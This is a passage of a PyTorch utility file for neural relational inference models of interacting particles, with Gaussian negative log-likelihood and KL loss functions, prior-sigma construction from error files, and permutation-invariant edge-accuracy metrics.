:param add_const: True- adds the 1/2 ln(2*pi*variance) term
:return: value of the loss function normalised by (batch * number of atoms), value for loss of each term
"""
# get normalised vectors for acceleration and velocities v|| and a||
# t = time.time()
velnorm = vel.norm(p=2, dim=3, keepdim=True)
normalisedvel = vel.div(velnorm.expand_as(vel))
# 1/sqrt(2) - isotropic when NaN => direction unimportant. chosen here to improve efficiency
normalisedvel[torch.isnan(normalisedvel)] = np.power(1 / 2, 1 / 2)
accelnorm = accel.norm(p=2, dim=3, keepdim=True)
normalisedaccel = accel.div(accelnorm.expand_as(accel))
normalisedaccel[torch.isnan(normalisedaccel)] = np.power(1 / 2, 1 / 2)
    # tanh activation keeps the Pearson correlation coefficients within (-1,1); the (1 - eps) factor keeps them
    # away from +/-1 and alpha stops them saturating too quickly: see arXiv:1910.14215 [cs.LG] R.L. Russell et al
indices_pos = torch.LongTensor([1, 2])
indices_vel = torch.LongTensor([5, 6])
if preds.is_cuda:
indices_pos, indices_vel = indices_pos.cuda(), indices_vel.cuda()
    # extract the Pearson coefficients output by the NN
rho_pos = torch.index_select(sigma, 3, indices_pos)
rho_vel = torch.index_select(sigma, 3, indices_vel)
    # rescale the Pearson coefficients
rho_pos = (1 - eps) * torch.tanh(alpha * rho_pos)
rho_vel = (1 - eps) * torch.tanh(alpha * rho_vel)
# extract each of the sigma terms for position and velocity
indices_pos_1 = torch.LongTensor([0])
indices_pos_2 = torch.LongTensor([3])
indices_vel_1 = torch.LongTensor([4])
indices_vel_2 = torch.LongTensor([7])
if preds.is_cuda:
indices_pos_1, indices_pos_2, indices_vel_1, indices_vel_2 = indices_pos_1.cuda(), indices_pos_2.cuda(), indices_vel_1.cuda(), indices_vel_2.cuda()
sigma_pos_1 = torch.index_select(sigma, 3, indices_pos_1)
sigma_pos_2 = torch.index_select(sigma, 3, indices_pos_2)
sigma_vel_1 = torch.index_select(sigma, 3, indices_vel_1)
sigma_vel_2 = torch.index_select(sigma, 3, indices_vel_2)
    # off-diagonal terms of the sigma matrix are given by rho * sqrt(sigma1 * sigma2)
sigma_term_pos = torch.sqrt((sigma_pos_1 * sigma_pos_2))
sigma_term_vel = torch.sqrt((sigma_vel_1 * sigma_vel_2))
offdiagsigma_pos = tile(sigma_term_pos, 3, rho_pos.size(3))
offdiagsigma_vel = tile(sigma_term_vel, 3, rho_vel.size(3))
sigmaoffdiag_pos = rho_pos * offdiagsigma_pos
sigmaoffdiag_vel = rho_vel * offdiagsigma_vel
# need Sigma=Sigma^2, Sigma^-2 and det(Sigma)
# ti = time.time()
# reconstruct sigma from position and velocity
indices_pos_1 = torch.LongTensor([0])
indices_pos_2 = torch.LongTensor([3])
indices_vel_1 = torch.LongTensor([4])
indices_vel_2 = torch.LongTensor([7])
if preds.is_cuda:
indices_pos_1, indices_pos_2, indices_vel_1, indices_vel_2 = indices_pos_1.cuda(), indices_pos_2.cuda(), indices_vel_1.cuda(), indices_vel_2.cuda()
sigma_pos = torch.cat((torch.cat((torch.index_select(sigma, 3, indices_pos_1), sigmaoffdiag_pos), 3),
torch.index_select(sigma, 3, indices_pos_2)), 3)
sigma_vel = torch.cat((torch.cat((torch.index_select(sigma, 3, indices_vel_1), sigmaoffdiag_vel), 3),
torch.index_select(sigma, 3, indices_vel_2)), 3)
sigma_pos = sigma_pos.reshape(sigma.size(0), sigma.size(1), sigma.size(2), 2, 2)
sigma_vel = sigma_vel.reshape(sigma.size(0), sigma.size(1), sigma.size(2), 2, 2)
# get sigma^2 for pos and vel
variance_pos = torch.matmul(sigma_pos, sigma_pos)
variance_vel = torch.matmul(sigma_vel, sigma_vel)
# reshape to desired shape for use
variance_pos = variance_pos.reshape(variance_pos.size(0), variance_pos.size(1), variance_pos.size(2), 4)
variance_vel = variance_vel.reshape(variance_vel.size(0), variance_vel.size(1), variance_vel.size(2), 4)
indices_sigma = torch.LongTensor([0, 3])
indices_diag_1 = torch.LongTensor([1, 2])
if preds.is_cuda:
indices_sigma, indices_diag_1 = indices_sigma.cuda(), indices_diag_1.cuda()
# extract variance
var_pos = torch.index_select(variance_pos, 3, indices_sigma)
var_vel = torch.index_select(variance_vel, 3, indices_sigma)
offdiag_pos = torch.index_select(variance_pos, 3, indices_diag_1)
offdiag_vel = torch.index_select(variance_vel, 3, indices_diag_1)
# ensures variance does not go to 0
if (torch.min(var_pos) < pow(10, -14)) or (torch.min(var_vel) < pow(10, -14)):
accuracy = np.full((var_pos.size(0), var_pos.size(1), var_pos.size(2), var_pos.size(3)),
pow(10, -14), dtype=np.float32)
accuracy = torch.from_numpy(accuracy)
if preds.is_cuda:
accuracy = accuracy.cuda()
var_pos = torch.max(var_pos, accuracy)
var_vel = torch.max(var_vel, accuracy)
indices_1 = torch.LongTensor([0])
indices_2 = torch.LongTensor([1])
if preds.is_cuda:
indices_1, indices_2 = indices_1.cuda(), indices_2.cuda()
# recasts the variance into desired form
variance_pos = torch.cat((torch.cat((torch.index_select(var_pos, 3, indices_1), offdiag_pos), 3),
torch.index_select(var_pos, 3, indices_2)), 3)
variance_vel = torch.cat((torch.cat((torch.index_select(var_vel, 3, indices_1), offdiag_vel), 3),
torch.index_select(var_vel, 3, indices_2)), 3)
variance_pos = variance_pos.reshape(variance_pos.size(0), variance_pos.size(1), variance_pos.size(2), 2, 2)
variance_vel = variance_vel.reshape(variance_vel.size(0), variance_vel.size(1), variance_vel.size(2), 2, 2)
    # determinant of a block diagonal matrix = product of the determinants of the sub-matrices
determinant_pos = variance_pos.det()
determinant_vel = variance_vel.det()
determinant = determinant_vel * determinant_pos
    # Matrix is not invertible iff sigma1 or sigma2 == 0 or the Pearson correlation coefficients are +/-1
    # (we ensure this is not the case above). The inverse is of the form
    #   1/(1-rho^2) * [  1/sigma1^2            -rho/(sigma1*sigma2) ]
    #                 [ -rho/(sigma1*sigma2)    1/sigma2^2          ]
inversevariance_pos = torch.inverse(variance_pos)
inversevariance_vel = torch.inverse(variance_vel)
inversevariance_pos = inversevariance_pos.reshape(inversevariance_pos.size(0), inversevariance_pos.size(1), inversevariance_pos.size(2), 4)
inversevariance_vel = inversevariance_vel.reshape(inversevariance_vel.size(0), inversevariance_vel.size(1),
inversevariance_vel.size(2), 4)
# if np.isnan(np.sum(inversevariance.cpu().detach().numpy())):
# print("Some values from variance are nan")
# need position and velocity differences in (x,y) coordinates
differences = preds-target
indices_pos = torch.LongTensor([0,1])
indices_vel = torch.LongTensor([2,3])
if preds.is_cuda:
indices_pos, indices_vel = indices_pos.cuda(), indices_vel.cuda()
position_differences = torch.index_select(differences, 3, indices_pos)
velocity_differences = torch.index_select(differences, 3, indices_vel)
position_differences = position_differences.unsqueeze(4)
    velocity_differences = velocity_differences.unsqueeze(4)  # (x-mu)
# print('getdifferences: {:.1f}s'.format(time.time() - ti))
    # the matrix multiplication for the multivariate case can be thought of as taking a projection of the error
    # vector along the parallel and perpendicular velocity/acceleration directions and multiplying by 1/sigma^2
    # along that direction. This follows directly from the fact that the rotation matrix is orthogonal.
# multime = time.time()
    # surprisingly it is more efficient to calculate the perpendicular term by considering
    # (position_differences - (position_differences.v||)v||).vperp to get the position differences in the
    # perpendicular direction than by using the rotation (x,y) -> (-y,x), as the triple for loop is inefficient;
    # about 100x faster this way and almost as fast as the isotropic case
errorvectorparalleltov = torch.matmul(normalisedvel.unsqueeze(3), position_differences)
parallelterm = torch.matmul(normalisedvel.unsqueeze(4), errorvectorparalleltov)
perpterm = (position_differences - parallelterm).squeeze()
perpnorm = perpterm.norm(p=2, dim = 3, keepdim = True)
    # NaN can occur when dividing by 0 (see comment below). The problem with replacing NaN after the division is
    # that the NaN carries through anyway - the function being backpropagated through keeps the NaN and therefore
    # leads to NaN errors on the second pass of the function - replacing the 0's before the division solves this
    # issue.
if (torch.min(perpnorm) < pow(10, -7)):
accuracy = np.full((perpnorm.size(0), perpnorm.size(1), perpnorm.size(2), perpnorm.size(3)),
pow(10, -7), dtype=np.float32)
accuracy = torch.from_numpy(accuracy)
if preds.is_cuda:
accuracy = accuracy.cuda()
perpnorm = torch.max(perpnorm, accuracy)
normalisedperp = perpterm.div(perpnorm.expand_as(perpterm))
    # NaN can occur when perpterm is 0; this means that preds-true = ((preds-true).v||) v||,
    # i.e. the error is entirely in the parallel direction and none is perpendicular: so we set these terms to 0
# normalisedperp[torch.isnan(normalisedperp)] = 0
errorvectorperptov = torch.matmul(perpterm.unsqueeze(3), normalisedperp.unsqueeze(4)).squeeze()
errorvectorparalleltov = errorvectorparalleltov.squeeze()
# errorvectorperptov = torch.matmul(velperp.unsqueeze(3), position_differences).squeeze()
errorvectorparalleltoa = torch.matmul(normalisedaccel.unsqueeze(3), velocity_differences)
parallelterm = torch.matmul(normalisedaccel.unsqueeze(4), errorvectorparalleltoa)
perpterm = (velocity_differences - parallelterm).squeeze()
perpnorm = perpterm.norm(p=2, dim=3, keepdim=True)
if (torch.min(perpnorm) < pow(10, -7)):
accuracy = np.full((perpnorm.size(0), perpnorm.size(1), perpnorm.size(2), perpnorm.size(3)),
pow(10, -7), dtype=np.float32)
accuracy = torch.from_numpy(accuracy)
if preds.is_cuda:
accuracy = accuracy.cuda()
perpnorm = torch.max(perpnorm, accuracy)
normalisedperp = perpterm.div(perpnorm.expand_as(perpterm))
    # NaN when preds-target is entirely in the v parallel direction. This means the error in the perpendicular
    # direction is 0
# normalisedperp[torch.isnan(normalisedperp)] = 0
errorvectorperptoa = torch.matmul(perpterm.unsqueeze(3), normalisedperp.unsqueeze(4)).squeeze()
errorvectorparalleltoa = errorvectorparalleltoa.squeeze()
# errorvectorperptoa = torch.matmul(accelperp.unsqueeze(3), velocity_differences).squeeze()
indices_par = torch.LongTensor([0])
indices_perp = torch.LongTensor([3])
indices_rho12 = torch.LongTensor([1])
indices_rho21 = torch.LongTensor([2])
#print('matrixmult: {:.1f}s'.format(time.time() - multime))
if preds.is_cuda:
indices_par, indices_perp, indices_rho12, indices_rho21 = indices_par.cuda(), indices_perp.cuda(), indices_rho12.cuda(), indices_rho21.cuda()
# t = time.time()
losscomponentparalleltov = (errorvectorparalleltov ** 2) * torch.index_select(inversevariance_pos, 3, indices_par).squeeze()
losscomponentperptov = (errorvectorperptov ** 2) * torch.index_select(inversevariance_pos, 3, indices_perp).squeeze()
losscomponentparalleltoa = (errorvectorparalleltoa ** 2) * torch.index_select(inversevariance_vel, 3, indices_par).squeeze()
losscomponentperptoa = (errorvectorperptoa ** 2) * torch.index_select(inversevariance_vel, 3, indices_perp).squeeze()
    losscomponentoffdiagv = (errorvectorperptov * errorvectorparalleltov) * (torch.index_select(inversevariance_pos, 3, indices_rho12) + torch.index_select(inversevariance_pos, 3, indices_rho21)).squeeze()
    losscomponentoffdiaga = (errorvectorperptoa * errorvectorparalleltoa) * (torch.index_select(inversevariance_vel, 3, indices_rho12) + torch.index_select(inversevariance_vel, 3, indices_rho21)).squeeze()
    neg_log_loss = losscomponentparalleltov + losscomponentperptov + losscomponentparalleltoa + losscomponentperptoa + losscomponentoffdiagv + losscomponentoffdiaga
loss_1 = neg_log_loss
loss_2 = 0.0
# print('getlosscomponents: {:.1f}s'.format(time.time() - t))
if add_const:
        const = 0.5 * torch.log(2 * np.pi * determinant)
neg_log_loss += const.squeeze()
loss_2 += const.squeeze()
    return (neg_log_loss).sum() / (target.size(0) * target.size(1)), loss_1.sum() / (target.size(0) * target.size(1)), loss_2 / (target.size(0) * target.size(1))  # normalisation here is (batch * num atoms)
def true_flip(x, dim):
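    """
    Flips tensor x along dimension dim by indexing with a reversed arange
    (an explicit equivalent of torch.flip along a single dimension).
    """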
indices = [slice(None)] * x.dim()
indices[dim] = torch.arange(x.size(dim) - 1, -1, -1,
dtype=torch.long, device=x.device)
return x[tuple(indices)]
def trace(A):
"""
taken from https://github.com/pytorch/pytorch/issues/7500
Takes the trace of the matrix
:param A: Tensor of at least dimension [1,1]. Takes trace of last two dimensions
"""
return A.diagonal(dim1=-2, dim2=-1).sum(-1)
def KL_output_multivariate(output, sigma, target, sigma_target, eps=1e-20):
"""
KL term for the multivariate Gaussian distribution. Trying to compare the output distribution to a prior Gaussian
distribution.
:param output: prediction values from NN of size [batch, particles, timesteps, (x,y,v_x,v_y)]
:param sigma: tensor of sigma values from NN of size [batch, particles, timesteps, (x,y,v_x,v_y)]
:param target: target data of size [batch, particles, timesteps, (x,y,v_x,v_y)]
:param sigma_target: tensor of sigma values from the prior of size [batch, particles, timesteps, (x,y,v_x,v_y)]
:param eps: small term to ensure that the logarithm doesn't become 0
:return: KL term normalised by batch size and no. of particles.
"""
# variance and target variance
variance = sigma ** 2
variance_target = sigma_target[:,:,:sigma.size(2),:] ** 2
# ensures the inverse will not yield NaN
if (torch.min(variance_target) < pow(10, -10)):
accuracy = np.full((variance_target.size(0), variance_target.size(1), variance_target.size(2), variance_target.size(3)),
pow(10, -10), dtype=np.float32)
accuracy = torch.from_numpy(accuracy)
if output.is_cuda:
accuracy = accuracy.cuda()
variance_target = torch.max(variance_target, accuracy)
inversevariance_target = variance_target ** -1
    trace_term = torch.sum(inversevariance_target * variance, dim=3)
    errorvect = (target - output) ** 2
error_term = errorvect * inversevariance_target
    determinant_variance = torch.prod(variance, dim=3)
    determinant_variance_target = torch.prod(variance_target, dim=3)
    logterm = torch.log((determinant_variance_target + eps) / (determinant_variance + eps))
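    # note: the standard closed-form KL between two Gaussians also contains a constant -d/2 term (d = dimension),
    # omitted here since it does not affect the gradients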
# add all 3 contributions
    KL_term = 0.5 * (trace_term + error_term.sum(dim=3) + logterm)
    return KL_term.sum() / (target.size(0) * target.size(1))
def get_deltax0(target):
"""
Gets the value of the mean change in position and velocity in the first timestep
:param target: tensor of all data points from simulation
target has dimensions [batch, particle, timestep, state]
:return: mean change in position and velocity over the first timestep
"""
# separate out the velocity and position terms
indices = torch.LongTensor([0,1])
indices_vel = torch.LongTensor([2,3])
if target.is_cuda:
indices, indices_vel = indices.cuda(), indices_vel.cuda()
target_pos = torch.index_select(target, 3, indices)
    # calculate the magnitude of the change in displacement
deltax0 = (target_pos[:,:,1,:]-target_pos[:,:,0,:]).squeeze()
deltax0 = deltax0.norm(p=2 , dim = 2, keepdim=True)
target_vel = torch.index_select(target, 3, indices_vel)
    # calculate the magnitude of the change in velocity
deltav0 = (target_vel[:, :, 1, :] - target_vel[:, :, 0, :]).squeeze()
deltav0 = deltav0.norm(p=2, dim=2, keepdim=True)
return deltax0.mean(), deltav0.mean()
def get_errorarray(phys_error_folder, comp_error_folder, data_folder='data', sim_folder=''):
"""
:param phys_error_folder: folder containing the theoretical values of the physical error
:param comp_error_folder: folder containing the theoretical values of the computational error
:param data_folder: folder containing the data
:param sim_folder: folder containing the simulation data
:return: the array for the contribution to sigma prior due to computational and physical errors for position and velocity
"""
# phys_errors has shape [different_sigma, timestep]. Get them from their respective files
phys_errors_pos = np.load(path.join(data_folder, phys_error_folder, 'mse_model_pos.npy'))
phys_errors_vel = np.load(path.join(data_folder, phys_error_folder, 'mse_model_vel.npy'))
    # array of sigma values used in phys_errors - different terms in dim 1
sigma = np.load(path.join(data_folder, phys_error_folder, 'sigma.npy'))
    # comp_errors has shape [timestep] - we know the form the computational error should follow
    comp_errors_pos = np.load(path.join(data_folder, comp_error_folder, 'mse_model_pos.npy'))
    comp_errors_vel = np.load(path.join(data_folder, comp_error_folder, 'mse_model_vel.npy'))
# index of current sigma: starts at smallest input value
sigma_current_pos = 0
sigma_current_vel = 0
# the data here is to recast the values calculated by the simulator into the range of the data in the model
loc_train = np.load(path.join(data_folder, sim_folder, 'loc_train.npy'))
vel_train = np.load(path.join(data_folder, sim_folder, 'vel_train.npy'))
loc_max = loc_train.max()
loc_min = loc_train.min()
vel_max = vel_train.max()
vel_min = vel_train.min()
# Normalize to [-1, 1]
phys_errors_vel = (phys_errors_vel - vel_min) * 2 / (vel_max - vel_min) - 1
comp_errors_vel = (comp_errors_vel - vel_min) * 2 / (vel_max - vel_min) - 1
phys_errors_pos = (phys_errors_pos - loc_min) * 2 / (loc_max - loc_min) - 1
comp_errors_pos = (comp_errors_pos - loc_min) * 2 / (loc_max - loc_min) - 1
sigma = (sigma - loc_min) * 2 / (loc_max - loc_min) - 1
delta_x_sqrd_array = []
delta_v_sqrd_array = []
offset_pos = 0
offset_vel = 0
    # iteratively build the array
for i in range(len(comp_errors_pos)):
delta_x_sqrd = comp_errors_pos[i] ** 2 + phys_errors_pos[sigma_current_pos, i-offset_pos] ** 2
delta_v_sqrd = comp_errors_vel[i] ** 2 + phys_errors_vel[sigma_current_vel, i - offset_vel] ** 2
# we have the max sigma so just use that
if (sigma_current_pos == len(sigma)-1):
delta_x_sqrd_array.append(delta_x_sqrd)
else:
            # if the error is greater than the next sigma value, use it as the new sigma value for the physical
            # errors and start its timestep index again from the beginning
if (delta_x_sqrd > sigma[sigma_current_pos+1] ** 2):
sigma_current_pos = sigma_current_pos + 1
delta_x_sqrd = comp_errors_pos[i] ** 2 + phys_errors_pos[sigma_current_pos, 0] ** 2
delta_x_sqrd_array.append(delta_x_sqrd)
offset_pos = i
else:
                # in the case where we do not need a new sigma value, just append the value to the array
delta_x_sqrd_array.append(delta_x_sqrd)
# we have the max sigma so just use that
if (sigma_current_vel == len(sigma) - 1):
delta_v_sqrd_array.append(delta_v_sqrd)
else:
            # if the error is greater than the next sigma value, use it as the new sigma value for the physical
            # errors and start its timestep index again from the beginning
if (delta_v_sqrd > sigma[sigma_current_vel + 1] ** 2):
sigma_current_vel = sigma_current_vel + 1
delta_v_sqrd = comp_errors_vel[i] ** 2 + phys_errors_vel[sigma_current_vel, 0] ** 2
delta_v_sqrd_array.append(delta_v_sqrd)
offset_vel = i
else:
                # in the case where we do not need a new sigma value, just append the value to the array
delta_v_sqrd_array.append(delta_v_sqrd)
    # convert the accumulated error arrays to tensors
    delta_x_sqrd_array = torch.FloatTensor(delta_x_sqrd_array)
    delta_v_sqrd_array = torch.FloatTensor(delta_v_sqrd_array)
return delta_x_sqrd_array, delta_v_sqrd_array
def getsigma_target(target, phys_error_folder, comp_error_folder, data_folder='data', sim_folder=''):
"""
:param target: tensor of all data points from simulation
target has dimensions [batch, particle, timestep, state]
:param phys_error_folder: folder containing the theoretical values of the physical error
:param comp_error_folder: folder containing the theoretical values of the computational error
:param data_folder: folder containing the data
:param sim_folder: folder containing the simulation data
:return: the array for the prior sigma tensor
"""
# gets the terms for the mean shift in position and velocity at the 1st timestep
deltax_0, deltav_0 = get_deltax0(target)
# gets the contribution due to errors
    delta_x_error_array, delta_v_error_array = get_errorarray(phys_error_folder, comp_error_folder, data_folder, sim_folder)
if target.is_cuda:
delta_x_error_array, delta_v_error_array = delta_x_error_array.cuda(), delta_v_error_array.cuda()
delta_x_error_array, delta_v_error_array = Variable(delta_x_error_array), Variable(delta_v_error_array)
# deltax^2 = deltax_0 ^2 + delta_x from error considerations
delta_x_array = delta_x_error_array + deltax_0 ** 2
delta_v_array = delta_v_error_array + deltav_0 ** 2
delta_x_array = tile(delta_x_array.unsqueeze(1), 1, 2)
delta_v_array = tile(delta_v_array.unsqueeze(1), 1, 2)
# output is of shape [timestep, (x,y, vx, vy)] needs to be recast into correct shape before use
return torch.sqrt(torch.cat((delta_x_array, delta_v_array), dim = 1))
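# Note (added): a hedged example of the recast mentioned above: the returned
# [timesteps, 4] prior sigma is typically broadcast back to the data layout,
# e.g. sigma_prior.unsqueeze(0).unsqueeze(0) -> [1, 1, timesteps, 4].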
def KL_between_blocks(prob_list, num_atoms, eps=1e-16):
    # Return a list of the KL divergences between every ordered block pair (used as a mutual-information-style penalty)
KL_list = []
for i in range(len(prob_list)):
for j in range(len(prob_list)):
if i != j:
KL = prob_list[i] *( torch.log(prob_list[i] + eps) - torch.log(prob_list[j] + eps) )
KL_list.append( KL.sum() / (num_atoms * prob_list[i].size(0)) )
KL = prob_list[i] *( torch.log(prob_list[i] + eps) - torch.log( true_flip(prob_list[j],-1) + eps) )
KL_list.append( KL.sum() / (num_atoms * prob_list[i].size(0)) )
return KL_list
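# Hedged numeric sketch (not part of the original pipeline; assumes PyTorch >= 0.4
# for torch.tensor) of the KL term used in KL_between_blocks, on two invented
# edge-probability blocks of shape [batch, num_edges, num_edge_types], num_atoms = 2.
def _kl_between_blocks_sketch(eps=1e-16):
    p = torch.tensor([[[0.9, 0.1], [0.2, 0.8]]])  # block i
    q = torch.tensor([[[0.5, 0.5], [0.5, 0.5]]])  # block j
    kl = p * (torch.log(p + eps) - torch.log(q + eps))
    return kl.sum() / (2 * p.size(0))  # same normalisation as the function above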
def decode_target( target, num_edge_types_list ):
target_list = []
base = np.prod(num_edge_types_list)
for i in range(len(num_edge_types_list)):
base /= num_edge_types_list[i]
target_list.append( target//base )
target = target % base
return target_list
def encode_target_list( target_list, edge_types_list ):
encoded_target = np.zeros( target_list[0].shape )
base = 1
for i in reversed(range(len(target_list))):
encoded_target += base*np.array(target_list[i])
base *= edge_types_list[i]
return encoded_target.astype('int')
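# Hedged round-trip example for the mixed-radix codec above (values invented):
# with num_edge_types_list = [2, 3], the integer 5 decodes to [5 // 3, 5 % 3] = [1, 2]
# and encode_target_list maps [1, 2] back to 1 * 3 + 2 = 5.
def _codec_roundtrip_sketch():
    factors = [2, 3]
    parts = decode_target(np.array([5]), factors)   # per-factor labels [1, 2]
    return encode_target_list(parts, factors)       # array([5])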
def edge_accuracy_perm_NRI_batch(preds, target, num_edge_types_list):
# permutation edge accuracy calculator for the standard NRI model
# return the maximum accuracy of the batch over the permutations of the edge labels
# also returns a one-hot encoding of the number which represents this permutation
# also returns the accuracies for the individual factor graphs
_, preds = preds.max(-1) # returns index of max in each z_ij to reduce dim by 1
num_edge_types = np.prod(num_edge_types_list)
    preds = np.eye(num_edge_types)[np.array(preds.cpu())]  # a nice way to turn integers into one-hot vectors
target = np.array(target.cpu())
perms = [p for p in permutations(range(num_edge_types))] # list of edge type permutations
# in the below, for each permutation of edge-types, permute preds, then take argmax to go from one-hot to integers
# then compare to target, compute accuracy
acc = np.array([np.mean(np.equal(target, np.argmax(preds[:,:,p], axis=-1),dtype=object)) for p in perms])
max_acc, idx = np.amax(acc), np.argmax(acc)
preds_deperm = np.argmax(preds[:,:,perms[idx]], axis=-1)
target_list = decode_target( target, num_edge_types_list )
preds_deperm_list = decode_target( preds_deperm, num_edge_types_list )
blocks_acc = [ np.mean(np.equal(target_list[i], preds_deperm_list[i], dtype=object),axis=-1)
for i in range(len(target_list)) ]
acc = np.mean(np.equal(target, preds_deperm ,dtype=object), axis=-1)
blocks_acc = np.swapaxes(np.array(blocks_acc),0,1)
idx_onehot = np.eye(len(perms))[np.array(idx)]
return acc, idx_onehot, blocks_acc
def edge_accuracy_perm_NRI(preds, targets, num_edge_types_list):
acc_batch, perm_code_onehot, acc_blocks_batch = edge_accuracy_perm_NRI_batch(preds, targets, num_edge_types_list)
acc = np.mean(acc_batch)
acc_var = np.var(acc_batch)
acc_blocks = np.mean(acc_blocks_batch, axis=0)
acc_var_blocks = np.var(acc_blocks_batch, axis=0)
return acc, perm_code_onehot, acc_blocks, acc_var, acc_var_blocks
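# Hedged toy check (labels and shapes invented) of why the permutation search
# above is needed: latent edge labels are only identified up to relabelling, so
# predictions [1, 0, 1] match target [0, 1, 0] perfectly once labels are swapped.
def _perm_invariance_sketch():
    target = np.array([[0, 1, 0]])
    preds_onehot = np.eye(2)[np.array([[1, 0, 1]])]
    accs = [np.mean(target == np.argmax(preds_onehot[:, :, p], axis=-1))
            for p in permutations(range(2))]
    return max(accs)  # 1.0, reached under the label swap (1, 0)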
def edge_accuracy_perm_fNRI_batch(preds_list, targets, num_edge_types_list):
# permutation edge accuracy calculator for the fNRI model
# return the maximum accuracy of the batch over the permutations of the edge labels
# also returns a one-hot encoding of the number which represents this permutation
# also returns the accuracies for the individual factor graphs
target_list = [ targets[:,i,:].cpu() for i in range(targets.shape[1])]
preds_list = [ pred.max(-1)[1].cpu() for pred in preds_list]
preds = encode_target_list(preds_list, num_edge_types_list)
target = encode_target_list(target_list, num_edge_types_list)
target_list = [ np.array(t.cpu()).astype('int') for t in target_list ]
num_edge_types = np.prod(num_edge_types_list)
    preds = np.eye(num_edge_types)[preds]  # a nice way to turn integers into one-hot vectors
perms = [p for p in permutations(range(num_edge_types))] # list of edge type permutations
# in the below, for each permutation of edge-types, permute preds, then take argmax to go from one-hot to integers
# then compare to target to compute accuracy
acc = np.array([np.mean(np.equal(target, np.argmax(preds[:,:,p], axis=-1),dtype=object)) for p in perms])
max_acc, idx = np.amax(acc), np.argmax(acc)
preds_deperm = np.argmax(preds[:,:,perms[idx]], axis=-1)
preds_deperm_list = decode_target( preds_deperm, num_edge_types_list )
blocks_acc = [ np.mean(np.equal(target_list[i], preds_deperm_list[i], dtype=object),axis=-1)
for i in range(len(target_list)) ]
acc = np.mean(np.equal(target, preds_deperm ,dtype=object), axis=-1)
blocks_acc = np.swapaxes(np.array(blocks_acc),0,1)
    idx_onehot = np.array([0])  # one-hot disabled here: np.eye(len(perms))[np.array(idx)] grows factorially with edge types
return acc, idx_onehot, blocks_acc
def edge_accuracy_perm_fNRI_batch_skipfirst(preds_list, targets, num_factors):
# permutation edge accuracy calculator for the fNRI model when using skip-first argument
# and all factor graphs have two edge types
# return the maximum accuracy of the batch over the permutations of the edge labels
# also returns a one-hot encoding of the number which represents this permutation
# also returns the accuracies for the individual factor graphs
targets = np.swapaxes(np.array(targets.cpu()),1,2)
preds = torch.cat( [ torch.unsqueeze(pred.max(-1)[1],-1) for pred in preds_list], -1 )
preds = np.array(preds.cpu())
perms = [p for p in permutations(range(num_factors))]
acc = np.array([np.mean( np.sum(np.equal(targets, preds[:,:,p],dtype=object),axis=-1)==num_factors ) for p in perms])
max_acc, idx = np.amax(acc), np.argmax(acc)
preds_deperm = preds[:,:,perms[idx]]
blocks_acc = np.mean(np.equal(targets, preds_deperm, dtype=object),axis=1)
acc = np.mean( np.sum(np.equal(targets, preds_deperm,dtype=object),axis=-1)==num_factors, axis=-1)
idx_onehot = np.eye(len(perms))[np.array(idx)]
return acc, idx_onehot, blocks_acc
def edge_accuracy_perm_fNRI(preds_list, targets, num_edge_types_list, skip_first=False):
if skip_first and all(e == 2 for e in num_edge_types_list):
acc_batch, perm_code_onehot, acc_blocks_batch = edge_accuracy_perm_fNRI_batch_skipfirst(preds_list, targets, len(num_edge_types_list))
else:
acc_batch, perm_code_onehot, acc_blocks_batch = edge_accuracy_perm_fNRI_batch(preds_list, targets, num_edge_types_list)
acc = np.mean(acc_batch)
acc_var = np.var(acc_batch)
acc_blocks = np.mean(acc_blocks_batch, axis=0)
acc_var_blocks = np.var(acc_blocks_batch, axis=0)
return acc, perm_code_onehot, acc_blocks, acc_var, acc_var_blocks
def edge_accuracy_perm_sigmoid_batch(preds, targets):
# permutation edge accuracy calculator for the sigmoid model
# return the maximum accuracy of the batch over the permutations of the edge labels
# also returns a one-hot encoding of the number which represents this permutation
    # also returns the accuracies for the individual factor graphs
targets = np.swapaxes(np.array(targets.cpu()),1,2)
preds = np.array(preds.cpu().detach())
preds = np.rint(preds).astype('int')
num_factors = targets.shape[-1]
perms = [p for p in permutations(range(num_factors))] # list of edge type permutations
# in the below, for each permutation of edge-types, permute preds, then take argmax to go from one-hot to integers
# then compare to target to compute accuracy
acc = np.array([np.mean( np.sum(np.equal(targets, preds[:,:,p],dtype=object),axis=-1)==num_factors ) for p in perms])
max_acc, idx = np.amax(acc), np.argmax(acc)
preds_deperm = preds[:,:,perms[idx]]
blocks_acc = np.mean(np.equal(targets, preds_deperm, dtype=object),axis=1)
acc = np.mean( np.sum(np.equal(targets, preds_deperm,dtype=object),axis=-1)==num_factors, axis=-1)
idx_onehot = np.eye(len(perms))[np.array(idx)]
return acc, idx_onehot, blocks_acc
def edge_accuracy_perm_sigmoid(preds, targets):
acc_batch, perm_code_onehot, acc_blocks_batch= edge_accuracy_perm_sigmoid_batch(preds, targets)
acc = np.mean(acc_batch)
acc_var = np.var(acc_batch)
acc_blocks = np.mean(acc_blocks_batch, axis=0)
acc_var_blocks = np.var(acc_blocks_batch, axis=0)
return acc, perm_code_onehot, acc_blocks, acc_var, acc_var_blocks
def initsigma(batchsize, time, anisotropic, noofparticles, initvar, ani_dims = 4):
"""
    initialises a Tensor of sigma values of size [batchsize, no. of particles, time, no. of axes (isotropic = 1,
    anisotropic = 4, or 2 for semi-isotropic)]
:param batchsize: size of the batch dimension. Int
:param time: size of the timestep dimension. Int
:param anisotropic: if it is anisotropic or not. Boolean
:param noofparticles: size of the particles dimension. Int
:param initvar: value of the initial variance. Float
:param ani_dims: dimensions that the anisotropic should have (default = 4)
:return: tensor of dimension [batchsize, noofparticles, time, ani_dims(or 1 if anisotropic = False)] with initvar at
each point
"""
if anisotropic:
ani = ani_dims
else:
ani = 1
# create numpy array of appropriate size
sigma = np.zeros((batchsize, noofparticles, time, ani), dtype = np.float32)
for i in range(len(sigma)):
for j in range(len(sigma[i])):
for l in range(len(sigma[i][j])):
for m in range(len(sigma[i][j][l])):
sigma[i][j][l][m] = np.float32(initvar)
return torch.from_numpy(sigma)
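# Equivalent vectorised construction (a sketch, assuming the same shape convention
# as above): the quadruple loop only fills a constant, so torch.full suffices.
def initsigma_fast(batchsize, time, anisotropic, noofparticles, initvar, ani_dims=4):
    ani = ani_dims if anisotropic else 1
    return torch.full((batchsize, noofparticles, time, ani), float(initvar))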
def tile(a, dim, n_tile):
""""
Taken from: https://discuss.pytorch.org/t/how-to-tile-a-tensor/13853/3
tiles the data along dimension dim
:param a: tensor to be tiled
:param dim: dimension along which the tiling is to be done
:param n_tile: number of times the tiling should be done along dimension dim
:returns: tiled tensor
"""
init_dim = a.size(dim)
repeat_idx = [1] * a.dim()
repeat_idx[dim] = n_tile
a = a.repeat(*(repeat_idx))
